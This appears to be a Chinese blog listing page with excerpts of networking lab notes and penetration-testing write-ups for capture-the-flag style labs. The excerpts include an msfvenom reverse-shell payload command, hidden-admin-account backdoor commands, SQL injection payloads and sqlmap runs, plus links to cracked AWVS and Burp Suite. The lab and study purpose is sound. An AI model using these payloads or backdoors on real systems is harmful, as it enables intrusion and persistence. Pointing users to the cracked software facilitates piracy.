- 博客(43)
- 收藏
- 关注
原创 华三模拟器(防火墙)实现IPSEC穿越NAT实验
华三模拟器(防火墙)实现IPSEC穿越NAT实验实验拓扑接口及路由配置省略,FW1和FW2配置默认路由即可实现公网互通(测试两端公网互通即可开始操作)另外防火墙的策略问题我是用的 any to any,接下来直接上IPSEC的配置FW1步骤一:在FW1上创建感兴趣流,匹配两端私网地址网段[FW1] acl advanced 3002[FW1] rule 5 permit ip source 192.168.1.0 0.0.0.255 destination 172.16.1.0 0.
2021-11-30 12:45:31
10194
3
原创 华三模拟器(路由器)实现ipsec穿越NAT实验
IPSEC VPN实验拓扑接口及路由配置省略,R1和R3配置默认路由即可实现公网互通(测试两端公网互通即可开始操作)接下来主要配置IPSEC VPN,如下配置R1配置R1配置步骤一:在R1上创建感兴趣流,匹配两端私网地址网段[R1] acl advanced 3500[R1] rule 5 permit ip source 192.168.1.0 0.0.0.255 destination 172.16.1.0 0.0.0.255步骤二:在 R1 上创建IKE提议,配置验证模式为预共
2021-11-29 13:28:45
4279
原创 win10系统上安装awvs漏洞扫描器
AWVS14版本安装安装包以及激活补丁链接链接:https://pan.baidu.com/s/1fiuLM8DOWXAEncVqaNVciA 提取码:i6oo 点击安装程序一直默认即可,安装目录可自定义,安装过程中会有两个位置选择,建议选择相同路径。接下来设置你的邮箱账号密码等信息,这里自己设置不多说设置默认端口,禁止远程连接一直默认即可,出现安装界面,点击安装等待即可,出现提示安装此证书至此awvs的安装完成,接下来安装激活程序,出现如下提示说明激活成功
2021-10-31 00:52:02
2133
原创 VulnStack域环境靶场渗透(一)
红日靶场一msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.31.229 LPORT=4444 -f exe -o msf1.exe实验环境web服务器192.168.31.79192.168.52.143域成员server2003192.168.52.141域控server2008192.168.52.138物理机192.168.31.238kali-vps192.168.31.229
2021-09-20 14:27:03
1556
原创 web应用常见漏洞
web应用常见漏洞<span style="color:red;">红色</span>学习目标章节学习目标ThinkPHP 远程代码执行掌握 Think php框架 V2.x (和V5.0.20) 远程代码执行漏洞利用方式Stuts2 代码执行漏洞掌握 Stuts2 (CVE-2019-0230) 远程代码执行漏洞的利用方式Shiro
2021-09-11 12:13:33
832
原创 Windows系统密码抓取与防护
Windows系统密码抓取与防护单机密码抓取与防范LM Hash 和NTLM HashLM Hash(DES加密) 默认禁用,一般攻击者抓取的LM Hash值为aad3b435b51404eeaad3b435b51404ee 表示LM Hash为空值或被禁用NTLM Hash(MD4加密) 真正是用户密码的哈希值Windows操作系统中的密码一般由两部分组成:一部分为LM Hash,另一部分为NTLM Hash。在Windows中,Hash的结构通常如下:Username:RID:LM-Ha
2021-09-10 18:12:02
1723
原创 Windows系统隐藏用户及粘贴键后门
Windows系统隐藏用户该方法是通过建立隐藏账户,制作系统用户远程控制后门,维持目标Windows系统权限。制作方法跟步骤如下:已经获取系统权限执行添加用户操作net user hahaha$ Aa123456 /addnet localgroup administrators hahaha$ /addnet user如上图,我们已经创建成功,执行net user命令,发现是看不到hahaha$用户的:但是这就结束了吗,没有!虽然上面net user看不见该隐藏用户,但是在控制面
2021-09-06 22:52:33
746
原创 主机与数据库安全
主机与数据库安全<span style="color:red;">红色</span>学习目标章节学习目标主机共享端口及漏洞利用/检测掌握FTP服务的爆破方式掌握sambs服务的爆破方式主机远程连接端口及漏洞利用/检测掌握SSH服务的爆破方式掌握Telnet服务的爆破方式掌握RDP服务的爆破方式数据库服务端口及漏洞利用/检测了解数据库间的差异掌握MySql数据库的暴力破解掌握Postgresql数据库的暴力破解掌握mongodb数据库的暴力
2021-08-29 01:08:57
605
原创 墨者学院-----SQL注入漏洞测试(布尔盲注)
SQL注入漏洞测试(布尔盲注)第一步判断注入点:在url中输入单引号发现报错,再输入and1=1页面正常,and1=2报错说明此url存在着SQL注入漏洞http://219.153.49.228:48551/new_list.php?id=1 and 1=2第二步判断字段数利用order by 语句,值为4页面正常,5报错,说明有四个字段http://219.153.49.228:48551/new_list.php?id=1 order by 4第三步:猜解数据库的长度以及数据库名称
2021-05-21 10:45:47
634
原创 墨者学院-----SQL过滤字符后手工注入漏洞测试(第3题)
SQL过滤字符后手工注入漏洞测试(第3题)按照正常流程,首先在url中输入单引号发现报错,接着输入–+发现页面正常此url种存在着字符型注入第一步判断字段数利用order by进行判断,发现字段数是7?id=1' order by 7 --+查找回显点?id=-1' union select 1,2,3,4,5,6, 7 --+http://219.153.49.228:45820/new_list.php?id=-1’ union select 1,2,3,4,5,6, 7 --+
2021-01-28 14:17:06
292
原创 墨者学院----SQL过滤字符后手工注入漏洞测试(第2题)
SQL过滤字符后手工注入漏洞测试(第2题)按照基本流程我们在url中输入单引号报错,说明存在SQL注入。直接输入order by发现页面异常,可能被过滤尝试利用like等于号和==/**/空格==进行绕过?id=1/**/order/**/by/**/4页面正常说明字段数为4接下来利用联合查询,看是否有回显点...
2021-01-26 15:25:43
483
1
原创 墨者学院-----SQL注入漏洞测试(宽字节)
SQL注入漏洞测试(宽字节)python2 sqlmap.py -u “http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27” --level 3 --risk 1 --thread 10python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3 --tamper unmagicquotes --dbs宽字节的注入原理...
2021-01-23 16:55:18
605
原创 墨者学院----SQL过滤字符后手工注入漏洞测试(第1题)
SQL过滤字符后手工注入漏洞测试(第1题)按照基本流程我们在url中输入单引号报错,说明存在SQL注入,但是在输入order by union select发现页面保持正常,有可能我们输入的字符被过滤过滤的"="号可以利用like代替,空格用==/**/==代替判断字段数/**/order/**/by/**/4介绍一个在线的url编码解码网站http://web.chacuo.net/charseturlencode由于被过滤所以我们要进行url的编码。%2f%2a%2a%2f%6f%7
2021-01-22 21:37:29
542
原创 墨者靶场------SQL注入漏洞测试(报错盲注)
SQL注入漏洞测试(报错盲注)自己构造请求参数,然后数据库返回错误的信息,以至于我们能够爆出我们想要的信息要进行SQL的报错注入,首先要了解MySQL的几个函数(1)concat 用来连接字符串select concat('m','y','s','q','l') 执行结果为mysql(2)updatexml第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法
2021-01-20 16:23:47
811
原创 墨者靶场----SQL注入漏洞测试(时间盲注)
SQL注入漏洞测试(时间盲注)第一种解法:利用回显点进行爆破数据库根据题目提示:墨者学院,在线靶场帮墨者找到==flag 使用?type= ==所以我们在url中输入:发现12是回显点http://219.153.49.228:49721/flag.php?type=12'利用12这个回显点进行查询数据库等信息获取数据库 pentesterlabhttp://219.153.49.228:49721/flag.php?type=database() --+获取数据库的表 comm
2021-01-20 01:35:06
796
1
原创 win10系统中安装专业版burp
win10系统安装burp破解版步骤1.安装burp所需的软件包burp的软件安装包链接:https://pan.baidu.com/s/1SF-VTuj0RbSCAR5YH6TSbQ提取码:b4y92.由于burp是运行在java环境下的一款渗透测试工具,所以必须安装在java环境下直接双击安装包即可,默认配置3.安装完成后需要配置JAVA的环境变量。(1)新建一个JAVA_HOME的系统变量,把JDK的安装路径写进系统变量(C:\Program Files\Java\jdk1.8.0_
2021-01-19 23:11:43
1730
原创 墨者靶场-X-Forwarded-For注入漏洞实战
墨者靶场-X-Forwarded-For注入漏洞实战打开靶场出现后台管理登录界面,随便输入一个用户名密码利用Burp进行拦截抓包在XFF字段的后面加上*,复制数据包到本地并保存为1.txt文档放入到Sqlmap中进行自动化探测爆破数据库sqlmap.py -r 1.txt --dbs --batch爆破表sqlmap.py -r 1.txt -D webcalendar --tables --batch爆破字段sqlmap.py -r 1.txt -D webcalendar
2021-01-19 23:10:19
328
原创 DVWA中low级别的SQL注入
DVWA中低级别的SQL注入基于错误的注入:构造特殊的SQL语句注入到数据库中,看得到的返回信息,确认注入点,如果数据库对输入的某些SQL语句无返回信息时,可以进行基于时间的注入(sleep函数)1.基于union的注入一般通过错误和布尔注入确认注入点之后,第一步猜解数据库的字段数//猜解数据库的字段数(列)' union select 1'后端代码执行如下:select first_name,last_name from dvwa.users where user_id='' uni
2020-11-23 20:24:38
826
原创 OSPF(开放最短路径优先)
OSPF路由协议1.OSPF路由协议的基本原理(1)邻居发现:运行了OSPF协议的路由器会周期性的以组播224.0.0.5的发送Hello报文来发现邻居,同时Hello报文提供维持邻居关系。每隔10s发送一次Hello报文。四个周期内未收到对端收到的Hello报文,则认为邻居失效。(2)路由交换:建立了邻居关系的路由器之间会发送自己所包含的路由表,如果自己没有对端的路由则会请求发送本身没有的...
2019-04-12 16:14:34
504
原创 STP的保护机制
BPDU保护:为了保护边缘端口,因为当一个边缘端口收到一个BPDU时,会状变为非边缘端口,会参与生成树的计算,如果频繁的UP/DOWN,就使网络一直处于生成树的计算。解决方法:在交换机的端口开启BPDU保护,当设置为BPDU保护的端口收到BPDU时,系统会将该端口变为down状态。配置:根桥保护:当网络中出现优先级更高的网桥时,根网桥可能会发生变化,导致闭塞端口发生变化,导致网络流量路径的转...
2018-11-29 17:15:51
7430
3
原创 RSTP(快速生成树协议)
相比于STP,RSTP的改进之处在以下几个方面(1)端口状态从5个变为3个。Discording,Learing,Forwarding(2)端口角色由三个变为4个。给根端口做备份的Althernate,给指定端口做备份的Backup。以及原有的根端口和指定端口。(3)BPDU的处理a:BPDU的类型变为Type2b:每台交换机都可以发送RST BPDU而不是只有根桥可以发送BPDU,好处...
2018-11-29 00:54:56
3022
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人